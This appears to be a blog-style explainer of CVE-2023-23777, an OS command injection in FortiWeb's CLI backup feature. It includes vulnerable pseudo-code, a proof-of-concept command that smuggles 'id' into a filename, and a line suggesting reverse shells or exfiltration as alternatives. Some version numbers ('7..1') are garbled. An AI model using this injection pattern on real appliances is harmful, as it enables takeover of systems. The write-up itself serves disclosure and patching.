CVE-2023-23777 - Exploiting FortiWeb Bash Command Injection (Simple Guide)

CVE-2023-23777 is a dangerous OS command injection bug (CWE-78) affecting several versions of Fortinet’s FortiWeb firewall. The flaw lets attackers with privileged access run any bash command via crafted input to the system’s CLI backup feature. Here you’ll find a detailed, easy-to-understand breakdown of how this works, code snippets, exploit examples, plus official references.

What Is CVE-2023-23777?

This vulnerability lives in FortiWeb appliances (versions 7..1 and below, all v6.4 releases, and 6.3.18 and under). When a backup is started from the CLI (cli), input fields are not properly cleaned. If a privileged user sends special bash syntax in parameters, the system ends up running that code directly on the OS.

Official Advisory Links

- Fortinet CVE-2023-23777 PSIRT Advisory
- NIST NVD Entry for CVE-2023-23777

How the Vulnerability Works

The FortiWeb CLI lets privileged users create configuration backups. It takes user input for file names or destination fields. But, in vulnerable versions, these parameters are put into a system shell command _without_ proper filtering or escaping.

Example of vulnerable code (pseudo-code)

// Simplified for demonstration
void backup_config(char* backup_destination){
  char cmd[256];
  snprintf(cmd, sizeof(cmd), "cp /config/configfile %s", backup_destination);
  system(cmd); // Oops! No input checking!
}

If the user puts something harmless, it's fine

backup_config("/tmp/mybackup.conf")

Resulting command:  

cp /config/configfile /tmp/mybackup.conf

But with malicious input

backup_config("/tmp/mybackup.conf ; id > /tmp/pwned ; #")

Resulting command

cp /config/configfile /tmp/mybackup.conf ; id > /tmp/pwned ; #"

Now, after the copy, the id command runs and writes to /tmp/pwned!

Proof-of-Concept Exploit

> Warning: This is for educational purposes only. Do not use it on systems you do not own or have permission to test!

Let’s say you already have an authenticated, privileged CLI session (SSH or local console).

`sh

exec backup config filename="/tmp/backup.cfg; id > /tmp/pwnd_by_me; #"

`

cp /config/configfile /tmp/backup.cfg; id > /tmp/pwnd_by_me; #

`

cat /tmp/pwnd_by_me

It should show user info, proving code execution.

You can substitute any shell command in place of id — such as starting a reverse shell, exfiltrating files, or adding new users.

Mitigation

- Upgrade FortiWeb: Fortinet patched this in versions above 7..1, 6.3.19, and in new 6.4 releases.  
 Download official firmware updates here.

References & Extra Reading

- Fortinet PSIRT - Official Notice
- MITRE CWE-78 - OS Command Injection
- NIST NVD CVE Entry

Conclusion

CVE-2023-23777 is a classic case of “OS command injection” — made possible by not sanitizing user data sent to a shell command. Anyone with privileged CLI access to vulnerable FortiWeb systems can fully compromise them. If you run FortiWeb, check your version and update to stay safe!

*If you enjoyed this breakdown or have more questions, feel free to reach out or share this resource with your team.*

Timeline

Published on: 07/11/2023 09:15:09 UTC
Last modified on: 11/07/2023 04:07:56 UTC